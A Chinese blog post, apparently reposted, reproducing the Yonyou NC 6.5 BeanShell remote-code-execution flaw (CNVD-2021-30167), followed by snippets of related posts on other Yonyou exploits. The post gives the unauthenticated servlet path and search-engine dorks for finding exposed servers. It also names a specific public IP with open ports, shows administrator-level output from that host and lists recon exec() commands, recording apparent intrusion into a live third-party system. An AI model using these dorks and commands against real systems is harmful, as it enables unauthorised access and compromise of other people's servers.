代码编织梦想

CNVD-2021-30167 用友NC 命令执行漏洞

一、漏洞情况分析

用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。

2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。由于用友NC对外开放了BeanShell的测试接口,未经身份验证的攻击者利用该测试接口,通过向目标服务器发送恶意构造的Http请求,在目标系统上直接执行任意代码,从而获得目标服务器权限。

CNVD对该漏洞的综合评级为“高危”。

二、漏洞影响范围

漏洞影响的产品版本包括:

用友NC 6.5

三、漏洞复现

访问未授权页面

http://:/servlet/~ic/bsh.servlet.BshServlet

app=“用友-UFIDA-NC” && country=“KR”
intitle:“Yonyou NC”
/servlet/~ic/bsh.servlet.BshServlet

https://blog.csdn.net/MSB_WLAQ/article/details/120556480 java 命令执行 getshellhttps://zhuanlan.zhihu.com/p/397421526

http://59.52.8.34:808/servlet/~ic/bsh.servlet.BshServlet
cmd Microsoft Windows Server 2003 DELL-69B95F93F5
https://blog.csdn.net/qq_45552960/article/details/104739680 03 提权
Apache Tomcat/5.5.9
dell-69b95f93f5\administrator
Discovered open port 805/tcp on 59.52.8.34
Discovered open port 888/tcp on 59.52.8.34
Discovered open port 808/tcp on 59.52.8.34
Discovered open port 1433/tcp on 59.52.8.34

https://blog.csdn.net/anlr2020/article/details/119873672 刷洞

exec("ifconfig");
exec("help")  
exec("net config workstation")
exec("netstat -ano -p tcp")
exec("whoami")

https://www.bilibili.com/read/cv12618507/
https://www.bilibili.com/read/cv11816691

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33608000/article/details/127156674

用友GRP-u8 XXE 漏洞复现-爱代码爱编程

0x00 漏洞描述  用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。 0x01 漏洞利用条件 无需登录 0x02 漏洞复现 POC: POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded Use

用友漏洞php,用友NC任意文件上传漏洞复现-爱代码爱编程

0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞。漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击

用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)-爱代码爱编程

注:此文章仅供参考,未经企业单位授权请勿非法测试! 一、漏洞介绍 1.1 NC介绍   用友NCV6.5系统作为用友软件公司主打互联网平台型的ERP系统,致力于以混合云模式支撑大型企业的互联网化。面向集团企业的管理软件,同类市场占有率达到亚太第一。 1.2 漏洞介绍   2021年5月27日CNVD公开用友NC存在远程命令执行漏洞: 该

用友NC存在命令执行漏洞(CNVD-2021-30167)复现-爱代码爱编程

漏洞说明:2021年5月27日,国家信息安全漏洞共享平台(CNVD)公布了用友NC存在命令执行漏洞(CNVD-2021-30167),用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。 2021年6月2日,用友公司发布了关于用友NC BeanShell远程代码执

用友NC的一些漏洞复现-爱代码爱编程

用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对

三个代码执行漏洞的复现-爱代码爱编程

三个代码执行漏洞的复现 前言 前段时间参加了公司组织的培训,讲到代码执行时,举了3个例子,今天统一进行复现。这三个漏洞分别是: CNVD-2021-30167(用友NC BeanShell远程代码执行)CVE-2019-0193(Apache Solr Velocity模板注入RCE)CVE-2020-14882(Weblogic Console远程

用友致远U8-OA getSessionList jsp信息泄露复现-爱代码爱编程

漏洞简介 用友U8-OA和致远A6系统getSessionList.jsp文件存在漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。 漏洞成因 getSessionList.jsp存在缺陷 <%@ page contentType="text/html;charset=GBK

致远(用友)oa或m1 漏洞复现_保持 平常心的博客-爱代码爱编程

1. A6版本漏洞 1.1 Session泄露导致任意文件上传GetShell漏洞 漏洞简介: 致远OA通过发送特殊请求获取session,在通过文件上传接口上传特殊构造的恶意压缩包,并通过解压为webshell控制服务器 根据不同版本的OA (A6、A8 请求链接方式不一样) 漏洞影响: 致远OA A6版本 漏洞复现 第一步:通过固定URL请求获取

用友oa漏洞复现手册_cnnvd-爱代码爱编程

前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。 漏洞列表: 用友 FE协作办公平台 templateOfTaohong_manager